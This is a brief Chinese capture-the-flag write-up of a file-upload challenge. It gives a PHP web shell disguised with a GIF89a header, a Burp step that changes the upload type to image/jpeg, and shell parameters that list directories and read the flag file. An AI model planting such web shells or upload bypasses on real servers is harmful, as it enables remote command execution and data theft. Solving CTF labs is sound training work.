刚开始看到这道题的时候,毫无疑问,可以看出来这是一道文件上传漏洞,既然如此,就按照寻常的方法来做这一题,首先写一个文件叫getshell.php的文件,里面的内容为
GIF89a
<?php system($_GET['shell']);?>
之后使用burp抓包,将其文件类型改为image/jpeg之后放行就可以上传成功了,浏览器上能够有回显,之后我们访问这个文件,能发现浏览器有GIF89a的回显,那么就证明能访问到,之后,我们就可以通过get传参来获取flag,我们构造语句为
?shell=ls ../../../../
一次增加../的个数来查看文件夹,根据名称判断flag是否在里边,之后就构造
?shell=cat ../../../../../f*
来获取flag的值。